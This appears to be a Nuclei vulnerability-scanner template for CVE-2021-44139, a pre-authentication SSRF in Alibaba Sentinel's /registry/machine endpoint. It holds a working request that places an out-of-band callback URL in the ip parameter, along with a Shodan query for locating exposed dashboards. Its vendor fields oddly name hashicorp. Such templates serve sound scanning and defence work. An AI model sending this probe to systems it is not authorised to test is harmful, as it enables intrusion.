id: CVE-2021-44139 info: name: Alibaba Sentinel - Server-side request forgery (SSRF) author: DhiyaneshDK severity: high description: | There is a Pre-Auth SSRF vulnerability in Alibaba Sentinel version 1.8.2, which allows remote unauthenticated attackers to perform SSRF attacks via the /registry/machine endpoint through the ip parameter. remediation: | Apply the latest security patches or updates provided by Alibaba Sentinel to fix the SSRF vulnerability (CVE-2021-44139). reference: - https://github.com/alibaba/Sentinel/issues/2451 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-44139 cwe-id: CWE-918 epss-score: 0.01329 epss-percentile: 0.84554 cpe: cpe:2.3:a:hashicorp:sentinel:1.8.2:*:*:*:*:*:*:* metadata: max-request: 1 vendor: hashicorp product: sentinel shodan-query: title:"Sentinel Dashboard" tags: cve,cve2021,ssrf,alibaba,oast,misconfig,sentinel http: - method: GET path: - "{{BaseURL}}/registry/machine?app={{rand_base(5)}}&appType=0&version=0&hostname={{rand_base(5)}}&ip={{interactsh-url}}&port=0" matchers-condition: and matchers: - type: word part: interactsh_protocol # Confirms the DNS Interaction words: - "dns" - type: word part: header words: - application/json - type: word part: body words: - '"success":true' - '"msg":"success"' condition: and # digest: 4a0a0047304502202760b60be8cef741a5502ebdb239a1d93cef6d68bb4918ad184bc97e5b981f57022100ec1fbcce87fecf86a565d3092100203ef22a48c412fe70afbd296013935cec5a:922c64590222798bb761d5b6d8e72950